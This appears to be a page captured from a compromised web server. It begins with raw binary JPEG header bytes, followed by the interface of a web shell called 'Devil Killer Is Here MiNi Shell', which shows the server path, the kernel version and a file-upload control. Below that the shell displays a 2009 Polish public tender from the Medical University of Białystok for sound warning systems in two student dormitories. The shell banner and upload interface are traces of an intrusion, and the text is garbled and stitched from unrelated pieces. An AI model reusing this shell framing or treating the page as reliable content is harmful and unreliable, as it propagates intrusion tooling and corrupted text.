JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/217666-N-2009.html

<p class="kh_header"><b>Białystok: Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynkach  UMB:
Część 1 - Dom Studenta Nr 1 w Białymstoku, ul. Akademicka 3
Część 2 - Dom Studenta Nr 2 w Białymstoku, ul. Waszyngtona 23
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót.</b><br>
<b>Numer ogłoszenia: 217666 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynkach  UMB:
Część 1 - Dom Studenta Nr 1 w Białymstoku, ul. Akademicka 3
Część 2 - Dom Studenta Nr 2 w Białymstoku, ul. Waszyngtona 23
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres obowiązków Wykonawcy:
a) wykonanie projektów technicznych instalacji systemów DSO, łącznie z powią-zaniem  ich z  istniejącymi centralami instalacji SAP, zasilania i rezerwowania,
b) wykonanie kontrolnej inwentaryzacji do celów projektowych zgodności załą-czonych do SIWZ rzutów kondygnacji użytkowych Domów Studenta Nr 1 i 2,
c) opracowanie scenariusza na wypadek powstania pożaru,
d) opracowanie treści i formy komunikatów słownych,
e) opracowanie STWiOR,
f) uzyskanie akceptacji projektu przez rzeczoznawcę ds. ochrony  p.poż., 
g) uzyskanie wszelkich pozwoleń wymaganych przez przepisy prawa budowla-nego,   
h) przedłożenie dokumentacji do akceptacji inwestora (po dwa egzemplarze pro-jektu technicznego i STWiOR),
i) wykonanie instalacji (okablowania), dostawa i montaż osprzętu oraz urządzeń, zgodnie z wykonaną dokumentacją,
j) uruchomienie systemu DSO,
k) wykonanie pomiarów elektrycznych i akustycznych wykonanego systemu DSO, potwierdzających  użyteczność systemu, 
l) przedłożenie dokumentacji powykonawczej (dwa egzemplarze)
m) przedłożenie certyfikatów  i atestów na zastosowane  materiały, osprzęt i urządzenia,
n) obsługa konserwacyjna w okresie gwarancji,
o) sprawowanie nadzoru autorskiego w trakcie realizacji robót.
3) Wymagania szczegółowe:
a) skoordynowanie prac montażowych instalacji DSO z remontami pomieszczeń w Domach Studenta  Nr 1 i 2, które będą wykonywane w okresie 01.07-30.09.2009r., 
b) uwzględnienie w projektach technicznych i wykonawstwie, prowadzenie instalacji w nawiązaniu do planów remontowych i przebudowy pomieszczeń mieszkalnych w budynku nr 3 D.S. Nr 2 przy ul. Waszyngtona 23 (piętra I-VIII) w latach 2010-2012,
c) wykonywane prace montażowe nie mogą pogorszyć aktualnego stany pomiesz-czeń w zakresie funkcjonalnym i estetycznym, a wszelkie uszkodzenie po pra-cach budowlanych należy skutecznie naprawić,
d) Wykonawca ponosi wszelkie koszty zabezpieczenia pomieszczeń i mienia  Uczelni, znajdujących się w obrębie prac montażowych oraz zagwarantuje wła-ściwe bezpieczne warunki  BHP własnych pracowników i osób Zamawiającego, mogących przebywać na terenie prac montażowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.21.00-5, 45.31.21.00-8, 50.34.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W zakresie każdej Części oferta musi być zabezpieczona wadium w wysokości 5 000,00 zł; (słownie: pięć tysięcy 00/100 złotych). Wadium może być wniesione w jednej lub kilku na-stępujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębior-czości  ( Dz. U. Nr 109, poz.1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz.1824).
W przypadku wniesienia wadium w formach określonych w pkt b), c), d) i e) gwarancją lub poręczeniem powinno być objęte uprawnienie Zamawiającego do skorzystania z gwarancji lub poręczenia w sytuacji określonej w art. 46 ust. 4a ustawy Pzp. 
2) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawia-jącego: Bank Pekao S.A. Oddział w Białymstoku, numer r-ku: 40 124052 111111 000049 207392
4) Wadium wnoszone w formach wymienionych w pkt. 2 lit. b, c, d, e  należy złożyć w formie oryginału w Kancelarii Ogólnej UMB, ul. Kilińskiego 1, 15-089 Białystok (Pałac Branickich, lewe skrzydło-parter). Prosimy nie wkładać dokumentu do oferty.
5)  Wadium musi być wniesione najpóźniej w terminie składania ofert  do godz. 1000. 
 6)  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie znaj-dzie się na rachunku bankowym Zamawiającego.
7)  Zamawiający zwróci Wykonawcy niezwłocznie wadium, jeżeli:                
a) upłynie termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
c) Zamawiający unieważnił postępowanie o udzielenie zamówienia publicznego a protesty zostały  ostatecznie rozstrzygnięte lub upłynął termin ich wnoszenia. 
8)  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.
9) Zamawiający żąda ponownego wniesienia wadium w określonym terminie przez Wykonawców, którym zwrócono wadium na podstawie ust. 8, lit. b) i c), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. 
10) Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postę-powania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.
11) Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za przelew pieniędzy na rachu-nek bankowy wskazany przez Wykonawcę na formularzu ofertowym. 
12) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zosta-nie wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przy-czyn leżących po stronie Wykonawcy.
 13) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym  mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświad-czeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki: 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj. przy wykonaniu prac zatrudnią pracowników nadzoru posiadających uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z przepisami ustawy z dnia 7 lipca 1994r. - Prawo bu-dowlane  (t. jedn.: Dz. U. z 2006r., Nr. 156, poz. 1118 ze zm.), którzy są członkami izby samorządu zawodowego, zgodnie z art. 6 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. z 2001r. Nr 5, poz. 42 ze zm.) w specjalnościach: 
 - projektowej w zakresie instalacji elektrycznych, 
 - instalacyjnej w zakresie sieci instalacji  i urządzeń elektrycznych
   lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
 - zrealizowali co najmniej jedno zamówienie obejmujące zaprojektowanie i wy-konanie roboty budowlanej o wartości co najmniej 200 000,00 PLN brutto (słownie: dwieście tysięcy 00/100 PLN) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadze-nia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia;
d)  posiadają środki finansowe lub zdolność kredytową o wartości nie mniejszej niż 100 000,00 PLN (słownie: sto tysięcy 00/100 PLN);
 e)  znajdują się w sytuacji finansowej pozwalającej na wykonanie zamówienia przy założeniu, iż zapłata za wykonanie dokumentacji projektowej nastąpi w terminie 30 dni, a za wykonanie poszczególnych części prac montażowych, wg procentowego ich za-awansowania nastąpi w terminie 30 dni, na podstawie faktur VAT wystawionych w ostatnim dniu miesiąca od daty ich odbioru, potwierdzonych protokołami;
 f)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp).
2) Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły:  spełnia - nie spełnia, w oparciu o informacje zawarte w wymaganych w SIWZ dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacz-nie,  że w/w warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać wszystkie dokumenty (oryginały lub kopie poświadczone za zgodność z oryginałem) oraz oświadczenia wymagane odpowiednimi postanowieniami SIWZ. Oświadczenia i dokumenty podpisuje uprawniony lub upoważniony przedstawiciel Wykonawcy. Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez uprawnionego lub upoważnionego przedstawiciela Wykonawcy. Upoważnienie do podpisania oświadczeń i innych dokumentów powinno być dołączone do oferty. Ustanowione pełnomocnictwo musi być załączone do oferty w formie oryginału, odpisu lub kopii potwierdzonej notarialnie.    
1)	Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego  zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.): 
a)	oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 usta-wy Pzp i nie podleganiu wykluczeniu zgodnie z art. 24 ust. 1 i ust. 2 pkt. 1-4 ustawy Pzp - wg załącznika nr 2 w do SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy Wykonawca).
                1.1. Dokumenty potwierdzające posiadanie przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności:
a)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - odrębnie);
b)	koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym niniejszym zamówieniem;
c)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty; w przypadku oferty składanej wspólnie przez kilku Wyko-nawców, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - odrębnie i dodatkowo na spółkę cywilną;
d)	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolnicze-go Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzy-skał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu, wystawione nie wcześniej niż 3 mie-siące przed upływem terminu składania oferty; w przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - łącznie.
                1.2. Dokumenty potwierdzające posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdol-nymi do wykonywania zamówienia: 
a)	wykaz wykonanych ( co najmniej jedno zamówienie ) obejmujących zaprojektowanie i wyko-nanie robót budowlanych o wartości co najmniej 200 000,00 PLN brutto (słownie: dwieście tysięcy 00/100 PLN) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzie-lenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, od-powiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia wraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie; Dokumenty te powinny być załączone w formie oryginałów lub kopii potwierdzonych przez Wykonawcę za zgodność z oryginałem (wg załącznika nr 4 do SIWZ ); w przypadku oferty składanej przez podmioty występujące wspólnie z przedstawionych dokumentów musi wyni-kać, że warunki udziału w postępowaniu zostały spełnione łącznie przez podmioty występu-jące wspólnie;
b)	w zakresie robót - wykaz pracowników nadzoru, którzy będą uczestniczyć w wykonywaniu zamówienia wraz z załączonymi zaświadczeniami z właściwej izby samorządu zawodowe-go, potwierdzającymi aktualną przynależność tych osób do izby oraz posiadanymi przez nich uprawnieniami niezbędnymi do wykonywania czynności objętych zamówieniem; wykaz winien zawierać w odniesieniu do każdej z wymienionych osób następujące dane:
      imię i nazwisko, wykształcenie, posiadane uprawnienia (nr, rodzaj), planowana funkcja 
      w realizacji zamówienia, - dokumenty stwierdzające, że osoby wskazane w wykazie:
a.	posiadają wymagane uprawnienia budowlane do wykonywania samodzielnych funk-cji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. - Prawo budowlane;
b.	są członkami właściwych izb samorządów zawodowych inżynierów budownictwa tj. zaświadczenia właściwej izby ważne na dzień składania oferty.
                 1.3.  Dokumenty potwierdzające znajdowanie się przez wykonawcę w sytuacji 
                        ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wyko-nawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych (co najmniej 100 000,00 PLN, słownie: sto tysięcy 00/100 PLN) lub zdolność kredytową Wykonawcy nie mniejszą niż 100 000,00 (słownie: sto tysięcy 00/100 PLN), wystawiona nie wcześniej niż 3 miesiące przed terminem składania ofert w postępowaniu (w przy-padku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, z przedłożonych dokumentów musi wynikać, że warunek ten jest speł-niony przez nich łącznie).       
2)	Dokumenty pozostałe:
a.	wypełniony formularz ofertowy  - ( wg załącznika  nr  1 do SIWZ ); 
b.	wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom (jeżeli są przewidywani) - wg załącznika nr 3 do SIWZ;
c.	oświadczenie o odbyciu wizji lokalnej - wg załącznika nr 5 do SIWZ; 
d.	oświadczenie o udzieleniu na przedmiot zamówienia co najmniej 36 - miesięcz-nej gwarancji  (wg załącznika nr 1 do SIWZ- formularz  ofertowy);
e.	w  przypadku Wykonawców występujących wspólnie (konsorcjum, s. c.), Wykonawcy  skła-dają oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy;
f.	oświadczenia małżonka Wykonawcy ( wg  załącznika nr  7 do  SIWZ ) - zgodnie z zapi-sem  w  uwadze poniżej:
Uwaga: W związku z przepisem art. 787 kodeksu postępowania cywilnego, Wykonawcy wystę-pujący w obrocie jako indywidualny podmiot gospodarczy, wspólnicy spółki cywilnej, wspólnicy spółki jawnej, pozostający w związku małżeńskim na zasadzie ustawowej wspólno-ści majątkowej, zobowiązani są do złożenia oświadczeń współmałżonków, których treść stanowi załącznik nr 7 do SIWZ.
3)	Informacje dla Wykonawców mających siedzibę lub miejsce zamieszkania poza tery-torium RP: 
a)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypo-spolitej Polskiej, zamiast dokumentów, o których mowa wyżej:
- w ust 1, pkt.1.1., lit. a), b), c) i d)  - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępu-je się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właści-wym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania. Termin ważności dokumentów zawierających oświadczenie stosuje się odpowiednio jak w ust. 3. lit. a). 
4)	Wykonawcy występujący wspólnie (konsorcjum, s.c.) muszą ustanowić Wykonawcę - Pełnomocnika do reprezentowania ich w postępowaniu albo Wykonawcę - Pełnomoc-nika do reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie za-mówienia. 
1.	Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamó-wienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udziele-nie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umo-cowania. Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. Do-kument pełnomocnictwa należy przedstawić w formie oryginału lub kserokopii potwier-dzonej notarialnie. Wszelka korespondencja oraz rozliczenia dokonywane będą wy-łącznie z podmiotem występującym jako Pełnomocnik pozostałych, przy czym uregu-lowanie płatności następować będzie wprost na konto danego podmiotu (wyłącznie wskazanego w umowie) lub na utworzone w banku wspólne (np. konsorcjum) konto rozliczeniowe, na które wpłacane będą należności za świadczenia wykonane przez poszczególne podmioty. 
2.	Wykonawcy występujące wspólnie muszą złożyć oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy (do-łączyć oświadczenie). 
3.	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulu-jącej współpracę tych Wykonawców.      
       4.    Jeżeli do realizacji przedmiotu zamówienia Wykonawca przewiduje udział Podwyko-nawców, których prace określone są w ofercie, to szczegółowe zasady w tym zakre-sie określone są w § 14 wzoru umowy stanowiącym załącznik nr 6 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Medyczny w Białymstoku, ul. A. Mickiewicza 2c, 15-222 Białystok, Sekcja ds. zamówień publicznych, pok. nr 12a, Cena SIWZ - 100,00 PLN (sł.: sto złotych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2009 godzina 10:00, miejsce: Uniwersytet Medyczny w Białymstoku, ul. J. Kilińskiego 1, 15-089 Białystok, Kancelaria Ogólna UMB (lewe skrzydło Pałacu Branickich - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynku Domu  Studenta Nr 1 w Białymstoku, ul. Akademicka 3
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynku Domu  Studenta Nr 1 w Białymstoku, ul. Akademicka 3
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.21.00-5, 45.31.21.00-8, 50.34.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynku Domu  Studenta Nr 2 w Białymstoku, ul. Waszyngtona 23
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót..</p>
